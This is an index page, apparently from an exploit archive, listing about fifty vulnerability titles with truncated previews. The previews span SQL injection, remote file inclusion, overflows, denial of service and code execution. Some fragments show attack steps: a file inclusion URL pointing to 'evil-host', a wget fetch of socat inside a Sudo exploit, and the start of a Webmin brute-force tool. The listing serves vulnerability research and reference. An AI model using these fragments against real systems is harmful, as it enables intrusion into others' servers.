SQLiteManager 1.2 - main.php Multiple HTML Injection Vulnerabilities
SQLiteManager 1.2 - main.php Multiple HTML Injection Vulnerabilities source: https://www.securityfocus.com/bid/22731/info SQLiteManager is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input data. Exploiting these issues may allow an...
PHPFootball 1.6 - Remote Database Disclosure
PHPFootball 1.6 - Remote Database Disclosure Title : PHPFootball 1.6 show.php Remote Database Disclosure Vulnerability Author : ajann Contact : : S.Page : http://phpfootball.sourceforge.net $$ : Free Dork : inurl:/phpfootball/ DBREAD---------------------------------------------------------...
Apple Mac OSX 10.4.7 - Mach Exception Handling Local (10.3.x)
Apple Mac OSX 10.4.7 - Mach Exception Handling Local 10.3.x / excploit.c - 28 Nov 2005 - [email protected] Exploitable Mach Exception Handling Affected: Mac OS X 10.4.6 darwin 8.6.0 and older When a process executes a setuid executable, all existing rights to the task port are invalidated,...
Integramod Portal 2.0 rc2 - phpbb_root_path Remote File Inclusion
Integramod Portal 2.0 rc2 - phpbb_root_path Remote File Inclusion matasanos Integramod Portal 2.x File Inclusion Vulnerabilities affected software: Integramod Portal vendor: Integramod. You can download it from http://www.integramod.com level: Highly Critical (very critical)...
OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflows (PoC)
OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflows PoC / by Luigi Auriemma / include include include include ifdef WIN32 include // htonl else include endif define VER "0.1" define HEAPOVERSZ 512 define ITPHEAPOVERSZ 150000 define ALLOCSAMPLESZ 39 & 7 + 16 define SONGITPROJECT 0x20000 void...
Mambo Component User Home Pages 0.5 - Remote File Inclusion
Mambo Component User Home Pages 0.5 - Remote File Inclusion Kurdish Security Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Risk : High Class : Remote Script : User Home Pages Site : www.ravensportal.co.uk Thanx :...
QBik WinGate WWW Proxy Server 6.1.1.1077 - POST Remote Buffer Overflow
QBik WinGate WWW Proxy Server 6.1.1.1077 - POST Remote Buffer Overflow Proof of concept not for "in the wild" kiddies QBik Wingate version 6.1.1.1077 remote exploit for Win2k SP4 german by kcope in 2006 use IO::Socket; if $ARGV0 eq "" print "param1 = remote host"; exit; win32bind - EXITFUNC=seh...
panic-reloaded - TCP Denial of Service Tool
EZDatabase 2.1.1 - index.php Cross-Site Scripting
EZDatabase 2.1.1 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/16257/info EZDatabase is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to ha...
AppServ Open Project 2.4.5 - Remote File Inclusion
AppServ Open Project 2.4.5 - Remote File Inclusion source: https://www.securityfocus.com/bid/16166/info AppServ Open Project is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this...
Multiple Vendor BIOS - Keyboard Buffer Password Persistence (2)
Multiple Vendor BIOS - Keyboard Buffer Password Persistence (2) // source: https://www.securityfocus.com/bid/15751/info Multiple vendors fail to clear the BIOS (Basic Input-Output System) keyboard buffer after reading the preboot authentication password during the system startup process. Depending on...
SoftBiz B2B trading Marketplace Script 1.1 - selloffers.php?cid SQL Injection
SoftBiz B2B trading Marketplace Script 1.1 - selloffers.php?cid SQL Injection source: https://www.securityfocus.com/bid/15652/info Softbiz B2B Trading Marketplace is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize...
Snort 2.4.0 2.4.3 - Back Orifice Pre-Preprocessor Remote (Metasploit)
Snort 2.4.0 2.4.3 - Back Orifice Pre-Preprocessor Remote Metasploit $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...
PBLang 4.65 - Remote Command Execution (2)
PBLang 4.65 - Remote Command Execution 2 php.exe ..\www\r57pblang465.php localhost /pbl/ "pblcookie732128=Pe ng0; PBLsecid=a4c2f845c002ac54f5751440647f3c91;" Peng0 PrSrS $ARGV = $SERVER'argv'; global $ARGV; ifcount$ARGV == 0 echo...
K-COLLECT CSV_DB.CGI 1.0i_DB.CGI 1.0 - Remote Command Execution
K-COLLECT CSV_DB.CGI 1.0i_DB.CGI 1.0 - Remote Command Execution // source: https://www.securityfocus.com/bid/14059/info CSV_DB.CGI/i_DB.CGI are affected by a remote command execution vulnerability. Specifically, an attacker can supply arbitrary commands prefixed with the '|' character through the...
PostNuke Phoenix 0.7x - CATID SQL Injection
PostNuke Phoenix 0.7x - CATID SQL Injection source: https://www.securityfocus.com/bid/12683/info PostNuke Phoenix is reported prone to an SQL injection vulnerability. This issue arises due to insufficient sanitization of user-supplied input. It is reported that issue presents itself when maliciou...
Microsoft Internet Explorer - .ANI Downloader (MS05-002)
Microsoft Internet Explorer - .ANI Downloader MS05-002 / Modified by Vertygo aka Ivanm [email protected] all credits goes to houseofdabus Berend-Jan Wever and to milw0rm/ / Added string.h /str0ke / / HOD-ms05002-ani-expl.c: 2005-01-10: PUBLIC v.0.2 Copyright c 2004-2005 houseofdabus. MS05-002...
Webmin 1.5 - Web Brute Force (CGI)
Webmin 1.5 - Web Brute Force CGI !/usr/bin/perl use CGI qw:standard; use IO::Socket; $CGI::HEADERSONCE = 1; $CGI = new CGI; $atak = $CGI-param"atak"; $host = $CGI-param"host"; $wlist = $CGI-param"wlist"; $cmd = $CGI-param"cmd"; print $CGI-header-type='text/html',-charset='windows-1254'; print...
Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing
Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing Advisory Information ------------------------- Software Package : Hosting Controller Vendor Homepage : http://www.hostingcontroller.com Platforms : Windows based servers Vulnerable Versions : All version Tested on: v.6.1 Hotfix 1.4 Vendor...
phpBB 2.0.x - admin_cash.php PHP Remote File Inclusion
phpBB 2.0.x - admin_cash.php PHP Remote File Inclusion source: https://www.securityfocus.com/bid/11701/info A vulnerability is reported to exist in the phpBB CashMod module that may allow an attacker to include malicious PHP files containing arbitrary code to be executed on a vulnerable system...
AlShare Software NetNote Server 2.2 - Remote Denial of Service
AlShare Software NetNote Server 2.2 - Remote Denial of Service // source: https://www.securityfocus.com/bid/11677/info NetNote server is reported prone to a remote denial of service vulnerability. This issue occurs because the application does not handle exceptional conditions properly. NetNote...
ocPortal 1.0.3 - Remote File Inclusion
ocPortal 1.0.3 - Remote File Inclusion http://localhost/ocp-103/index.php?reqpath=http ://evil-host/ On your evil host you must put script funcs.php. Example of funcs.php if your host doesn't support php. Example of funcs.php if your host supports php. '; ?...
Microsoft Windows Server 2000 - Utility Manager All-in-One (MS04-019)
Microsoft Windows Server 2000 - Utility Manager All-in-One MS04-019 / COROMPUTER2004 Crpt Utility Manager exploit v2.666 modified by kralor Crpt It gets system language and sets windows names to work on any win2k :P Feel free to add other languages : v2.666: added autonomous allinone remote...
CVS (LinuxFreeBSD) - Remote Entry Line Heap Overflow
CVS LinuxFreeBSD - Remote Entry Line Heap Overflow include include include include include include include include include include include include include include typedef unsigned char uchar; void progressvoid; int brutecvsrootvoid; int bruteusernamevoid; int brutepasswordvoid; void hdlcrashedint...
Linux Kernel 2.2.252.4.242.6.2 - mremap() Validator
Linux Kernel 2.2.252.4.242.6.2 - mremap() Validator / Proof-of-concept exploit code for do_mremap 2 EDB Note: This is NOT to be confused with CVE-2003-0985 // https://www.exploit-db.com/exploits/141/, which would be "do_mremap 1". EDB Note: This will just "test" the vulnerability. An exploit version c...
DCP-Portal 5.5 - advertiser.php?Password SQL Injection
DCP-Portal 5.5 - advertiser.php?Password SQL Injection source: https://www.securityfocus.com/bid/8739/info Multiple SQL Injection vulnerabilities have been discovered that affect DCP-Portal scripts. These issues are likely due to a lack of sufficient sanitization performed on user supplied URI...
Cisco IOS - cisco-bug-44020.c IPv4 Packet Denial of Service
Cisco IOS - cisco-bug-44020.c IPv4 Packet Denial of Service // / cisco-bug-44020.c - Copyright by Martin Kluge [email protected] / / / / Feel free to modify this code as you like, as long as you include / / the above copyright statement. / / / / Please use this code only to check your OWN cisco...
InstaBoard 1.3 - index.cfm SQL Injection
InstaBoard 1.3 - index.cfm SQL Injection source: https://www.securityfocus.com/bid/7338/info It has been reported that multiple input validation errors exist in the index.cfm file included with InstaBoard. Because of this issue, remote attackers may launch SQL injection attacks through the...
Apache 2.x - Memory Leak
Apache 2.x - Memory Leak / apache-massacre.c Test code for Apache 2.x Memory Leak By Matthew Murphy DISCLAIMER: This exploit tool is provided only to test networks for a known vulnerability. Do not use this tool on systems you do not control, and do not use this tool on networks you do not own...
PHP 4 - PHPInfo() Cross-Site Scripting
PHP 4 - PHPInfo() Cross-Site Scripting source: https://www.securityfocus.com/bid/7805/info Scripts that include the PHP phpinfo() debugging function may be prone to cross-site scripting attacks. This could permit remote attackers to create a malicious link to a vulnerable PHP script that includes...
Microsoft Foundation Class Library 7.0 - ISAPI Buffer Overflow
Microsoft Foundation Class Library 7.0 - ISAPI Buffer Overflow // source: https://www.securityfocus.com/bid/5188/info The Microsoft Foundation Class Library is a library used to develop applications for Microsoft Windows. Some versions of the MFC include an ISAPI class, which can be used to...
Amtote Homebet - Account Information Brute Force
Amtote Homebet - Account Information Brute Force source: https://www.securityfocus.com/bid/3371/info Homebet is an internet based betting application that is developed by Amtote International. A vulnerability exists in Homebet which could enable a non-registered user to confirm the validity of...
ID Software Quake 3 - SMURF Denial of Service
ID Software Quake 3 - SMURF Denial of Service // source: https://www.securityfocus.com/bid/3060/info Quake 3 network play features contain a remotely exploitable denial of service vulnerability. A hostile client program can be used to generate a large number of forged client queries on behalf ...
Tarantella Enterprise 3 3.x - TTAWebTop.cgi Arbitrary File Viewing
Tarantella Enterprise 3 3.x - TTAWebTop.cgi Arbitrary File Viewing source: https://www.securityfocus.com/bid/2890/info Tarantella Enterprise 3 is a tool for centralized management of data and applications. It is operated via a web interface. It will run on a number of Unix and Linux distributions...
OReilly Software WebSite Professional 2.3.182.42.4.9 - webfind.exe Remote Buffer Overflow
OReilly Software WebSite Professional 2.3.182.42.4.9 - webfind.exe Remote Buffer Overflow // source: https://www.securityfocus.com/bid/1487/info O'Reilly WebSite Professional is a web server package distributed by O'Reilly & Associates. Certain versions of this web server the entire 2.X version...
Stake AntiSniff 1.0.1Researchers 1.0 - DNS Overflow (3)
Stake AntiSniff 1.0.1Researchers 1.0 - DNS Overflow 3 // source: https://www.securityfocus.com/bid/1207/info Certain versions of @Stake Inc.'s Antisniffer software contain a remotely exploitable buffer overflow. AntiSniff is a program that was released by L0pht Heavy Industries in July of 1999. I...
SCO Unixware 7.1 - varmail Permissions
SCO Unixware 7.1 - varmail Permissions source: https://www.securityfocus.com/bid/849/info Certain versions of SCO's UnixWare (only 7.1 was tested) ship with the /var/mail/ directory with permission 777 (-rwxrwxrwx). This in effect allows malicious users to read incoming mail for users who do not yet...
Compaq Client Management Agents 3.704.0 Insight Management Agents 4.21 A4.22 A4.30 A Intelligent Cluster Administrator 1.0 Management Agents for Workstations 4.20 A Server Management Agents 4.23 Survey Utility 2.0 - Web File Access
Compaq Client Management Agents 3.704.0 Insight Management Agents 4.21 A4.22 A4.30 A Intelligent Cluster Administrator 1.0 Management Agents for Workstations 4.20 A Server Management Agents 4.23 Survey Utility 2.0 - Web File Access source: https://www.securityfocus.com/bid/282/info A vulnerabilit...
FreeBSD 2.x HP-UX 91011 Kernel 2.0.3 Windows NT 4.0Server 2003 NetBSD 1 - land.c loopback Denial of Service (2)
FreeBSD 2.x HP-UX 91011 Kernel 2.0.3 Windows NT 4.0Server 2003 NetBSD 1 - land.c loopback Denial of Service 2 source: https://www.securityfocus.com/bid/2666/info A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and po...
Microsoft IIS 2.03.0 - Appended Dot Script Source Disclosure
Microsoft IIS 2.03.0 - Appended Dot Script Source Disclosure source: https://www.securityfocus.com/bid/2074/info Microsoft Internet Information Server (IIS) is a popular web server, providing support for a variety of scripting languages, including ASP (Active Server Pages). IIS 2.0 and 3.0 suffer fro...
Quick N Easy Web Server 3.3.8 - Denial of Service (PoC)
Quick N Easy Web Server 3.3.8 - Denial of Service PoC Title: Quick N Easy Web Server 3.3.8 - Denial of Service PoC Date: 2019-12-25 Author: Cody Winkler Vendor Homepage: https://www.pablosoftwaresolutions.com/ Software Link: https://www.pablosoftwaresolutions.com/html/quickneasywebserver.html...
eLection 2.0 - id SQL Injection
eLection 2.0 - id SQL Injection Title: eLection 2.0 - 'id' SQL Injection Date: 2020-02-21 Exploit Author: J3rryBl4nks Vendor Homepage: https://sourceforge.net/projects/election-by-tripath/ Software Link: https://sourceforge.net/projects/election-by-tripath/files/Version 2.0 Tested on Ubuntu 19/Ka...
AbsoluteTelnet 11.12 - "license name" Denial of Service (PoC)
AbsoluteTelnet 11.12 - license name Denial of Service PoC Exploit Title: AbsoluteTelnet 11.12 - "license name" Denial of Service PoC Discovery by: chuyreds Discovery Date: 2020-02-05 Vendor Homepage: https://www.celestialsoftware.net/ Software Link :...
AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC)
AbsoluteTelnet 11.12 - SSH2username Denial of Service PoC Exploit Title: AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service PoC Discovery by: chuyreds Discovery Date: 2020-02-05 Vendor Homepage: https://www.celestialsoftware.net/ Software Link :...
Sudo 1.8.25p - pwfeedback Buffer Overflow
Sudo 1.8.25p - pwfeedback Buffer Overflow !/bin/bash We will need socat to run this. if ! -f socat ; then wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x8664/socat chmod +x socat fi cat xpl.pl $bufsz = 256; $askpasssz = 32; $signosz = 465; $tgetpassflag =...
Cacti 1.2.8 - Authenticated Remote Code Execution
Cacti 1.2.8 - Authenticated Remote Code Execution !/usr/bin/python3 Exploit Title: Cacti v1.2.8 Remote Code Execution Date: 03/02/2020 Exploit Author: Askar @mohammadaskar2 CVE: CVE-2020-8813 Vendor Homepage: https://cacti.net/ Version: v1.2.8 Tested on: CentOS 7.3 / PHP 7.1.33 import requests...
Octeth Oempro 4.8 - CampaignID SQL Injection
Octeth Oempro 4.8 - CampaignID SQL Injection Exploit Title: Octeth Oempro 4.8 - 'CampaignID' SQL Injection Date: 2020-01-27 Exploit Author: Bruno de Barros Bulle www.xlabs.com.br Vendor Homepage: www2.octeth.com Version: Octeth Oempro v.4.7 and v.4.8 Tested on: Oempro v.4.7 CVE : CVE-2019-19740 A...
Nsauditor 3.1.8.0 - Name Denial of Service (PoC)
Nsauditor 3.1.8.0 - Name Denial of Service PoC Exploit Title: Nsauditor 3.1.8.0 - 'Name' Denial of Service PoC Discovery by: SajjadBnd Date: 2019-11-30 Vendor Homepage: http://www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Tested Version: 3.1.8.0...
Mersive Solstice 2.8.0 - Remote Code Execution
Mersive Solstice 2.8.0 - Remote Code Execution Exploit Title: Mersive Solstice 2.8.0 - Remote Code Execution Google Dork: N/A Date: 2016-12-23 Exploit Author: Alexandre Teyar Vendor Homepage: https://www2.mersive.com/ Firmware Link:...
rConfig 3.9.2 - Remote Code Execution
rConfig 3.9.2 - Remote Code Execution Exploit Title: rConfig 3.9.2 - Remote Code Execution Date: 2019-09-18 Exploit Author: Askar Vendor Homepage: https://rconfig.com/ Software link: https://rconfig.com/download Version: v3.9.2 Tested on: CentOS 7.7 / PHP 7.2.22 CVE : CVE-2019-16662...